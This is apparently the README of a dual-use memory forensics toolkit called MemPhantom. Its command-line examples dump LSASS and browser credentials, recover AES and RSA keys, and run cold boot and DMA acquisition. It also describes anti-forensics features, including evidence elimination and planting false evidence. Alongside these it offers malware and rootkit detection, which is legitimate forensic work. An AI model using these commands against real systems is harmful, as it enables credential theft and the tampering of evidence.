Advanced memory forensics toolkit for volatile data extraction, RAM analysis, and anti-forensics techniques. Extracts secrets from running processes including passwords, encryption keys, and in-memory malware.
- Live RAM Dumping - Extract full memory from running systems
- Process Memory Scraping - Target specific processes for secrets
- Kernel Memory Analysis - Direct kernel space examination
- Cold Boot Attack - Extract encryption keys from powered-off RAM
- DMA-based Acquisition - Hardware-level memory access via FireWire/Thunderbolt
- Credential Harvesting - Extract passwords from LSASS, browsers, SSH agents
- Encryption Key Recovery - Find AES/RSA keys in memory
- Private Key Extraction - SSL/TLS certificates from web servers
- Bitcoin Wallet Keys - Cryptocurrency wallet recovery
- Session Token Stealing - Active authentication tokens
- In-Memory Malware Detection - Find process hollowing, code injection
- Rootkit Detection - Identify kernel-mode rootkits via memory forensics
- Unpacking - Extract packed/encrypted malware from RAM
- Behavioral Analysis - Track malware activity in real-time
- Memory Wiping - Secure deletion of process secrets
- Key Scrubbing - Remove cryptographic material from RAM
- Evidence Elimination - Clean forensic artifacts
- Deception - Plant false evidence in memory
git clone https://github.com/varungor365/memphantom.git
cd memphantom
pip install -r requirements.txt
# Requires root/admin for memory access
sudo python setup.py install# Dump specific process
sudo python memphantom.py --dump --pid 1234 --output process.dmp
# Dump all processes
sudo python memphantom.py --dump-all --output /dumps/# Extract from LSASS (Windows)
sudo python memphantom.py --lsass --output creds.txt
# Extract from browsers
sudo python memphantom.py --browsers --output browser_creds.json# Search for AES keys
sudo python memphantom.py --find-keys --algorithm AES --output keys.bin
# Find RSA private keys
sudo python memphantom.py --find-keys --algorithm RSA --output rsa_keys.pem# Scan for injected code
sudo python memphantom.py --scan-injection --report malware.json
# Detect rootkits
sudo python memphantom.py --scan-rootkit --detailed# Wipe sensitive data from memory
sudo python memphantom.py --wipe --pid 5678
# Secure process termination (wipe then kill)
sudo python memphantom.py --secure-kill --pid 5678[+] MemPhantom v2.0 - Advanced Memory Forensics
[+] Target: LSASS (PID 612)
[+] Dumping process memory: 145 MB
[+] Analyzing memory structures...
[!] CREDENTIALS FOUND:
ββββββββββββββββββββββββββββββββββββββββββββββ
β User: DOMAIN\Administrator
β Password: P@ssw0rd123!
β NTLM Hash: 8846f7eaee8fb117ad06bdd830b7586c
β Location: 0x7FFE0000 (LSASS heap)
ββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββ
β Service: Chrome (gmail.com)
β Username: user@gmail.com
β Password: MySecretPass2024
β Location: 0x12340000 (Chrome process)
ββββββββββββββββββββββββββββββββββββββββββββββ
[+] Total credentials extracted: 47
[+] Unique accounts: 23
[+] Report saved: credentials_report.html
[!] AES-256 KEY FOUND:
Key: 0x3a5f7e9c1b2d4f6a8e0c7b9d1f3e5a7c9b1d3f5e7a9c1b3d5f7e9a1c3e5f7a9c
Location: 0x00401000 (OpenSSL heap)
Context: TLS session encryption
Strength: 256-bit
[!] RSA PRIVATE KEY DETECTED:
Size: 4096-bit
Format: PKCS#1
Location: 0x7FFEE000
Owner: nginx (PID 8192)
Certificate CN: www.example.com
[!] SUSPICIOUS ACTIVITY DETECTED:
β οΈ Process Hollowing
PID: 3456 (svchost.exe)
Hollowed by: unknown.exe
Malicious code at: 0x00400000
Entropy: 7.9 (likely packed)
β οΈ Code Injection
Target: explorer.exe (PID 1234)
Injector: malware.dll
Injection type: CreateRemoteThread
Shellcode at: 0x10000000
β οΈ Kernel Rootkit
Driver: rootkit.sys
SSDT hooks: 12 functions
Hidden processes: 3
Hidden files: 47
| Method | Speed | Stealth | Requires |
|---|---|---|---|
| /dev/mem | Fast | Low | Root, older kernels |
| /proc/kcore | Fast | Low | Root |
| ptrace() | Slow | Medium | Same user or root |
| DMA (FireWire) | Very Fast | High | Physical access |
| Cold Boot | N/A | Highest | Physical access + reboot |
- β Linux - Full support (2.6+ kernels)
- β Windows - Via WinPmem driver
- β macOS - Limited (SIP restrictions)
- β Memory Dumps - Analyze existing .raw/.dmp files
- Pattern Matching - Known structures (Windows LSASS, Linux shadow)
- Entropy Analysis - High-entropy regions likely encrypted/packed
- Structure Validation - Verify key formats (PEM, DER, PKCS)
- Context Analysis - Surrounding memory hints at usage
# 1. Freeze RAM with compressed air
# 2. Quickly reboot into forensics live USB
# 3. Dump RAM before decay
sudo python memphantom.py --cold-boot --output frozen_ram.raw
# 4. Search for encryption keys
python memphantom.py --analyze frozen_ram.raw --find-keys# Requires FireWire/Thunderbolt access
sudo python memphantom.py --dma --device /dev/fw0 --output dma_dump.raw# Monitor process memory for changes
sudo python memphantom.py --monitor --pid 1234 --interval 5
# Alert on new secrets
sudo python memphantom.py --watch --alert-on-secrets# Take snapshot
sudo python memphantom.py --snapshot --pid 1234 --output before.dmp
# ... system activity ...
# Compare
sudo python memphantom.py --diff before.dmp after.dmp --highlight-secretsfrom memphantom import SecureWipe
# Wipe specific memory region
SecureWipe.region(process_id=1234, start=0x400000, size=4096)
# Wipe all process secrets
SecureWipe.process_secrets(process_id=1234)
# Wipe and terminate
SecureWipe.secure_kill(process_id=1234)# Remove all crypto keys from process
sudo python memphantom.py --scrub-keys --pid 1234
# Wipe specific key types
sudo python memphantom.py --scrub-keys --type AES,RSA --pid 1234Software:
- Python 3.8+
- GCC (for C extensions)
- Root/Administrator access
- Volatility3 (optional, for advanced analysis)
Python Packages:
volatility3
pycryptodome
capstone
yara-python
rekall
Hardware (Optional):
- FireWire/Thunderbolt adapter (for DMA attacks)
- USB drive (for cold boot attacks)
- Post-exploitation credential harvesting
- Privilege escalation via key extraction
- Anti-forensics for operational security
- Malware memory analysis
- Rootkit detection
- Live forensics without shutting down systems
- Criminal investigations
- Data recovery
- Timeline reconstruction
- Vulnerability discovery
- Exploit development
- Reverse engineering
This tool is EXTREMELY POWERFUL and can:
- β Extract all passwords from a running system
- β Steal encryption keys and decrypt data
- β Bypass most security controls
- β Violate user privacy
Legal Use ONLY:
- β Your own systems (authorized testing)
- β Penetration tests (with written permission)
- β Incident response (company authorization)
- β Academic research (controlled environments)
Unauthorized use is ILLEGAL and may result in:
- Federal prosecution (CFAA, ECPA violations)
- Civil lawsuits
- Professional sanctions
- Prison sentences
Full documentation: docs/README.md
Key Topics:
- Memory acquisition techniques
- Secret detection algorithms
- Anti-forensics best practices
- Malware analysis workflows
- Legal and ethical guidelines
Security researchers welcome! Areas for contribution:
- New secret detection patterns
- Support for additional platforms
- Performance optimizations
- Anti-anti-forensics techniques
GPL-3.0 - See LICENSE
Research and authorized testing only. Respect privacy and laws.
Varun Goradhiya
- GitHub: @varungor365
- Portfolio: github.com/varungor365
Related Projects:
- phantom-lkm - Kernel rootkit
- autofuzzer - Vulnerability fuzzer
- vault-destruct - Secure password manager
Advanced memory forensics for security professionals. ππ§
β‘ This tool represents cutting-edge forensics research - use responsibly.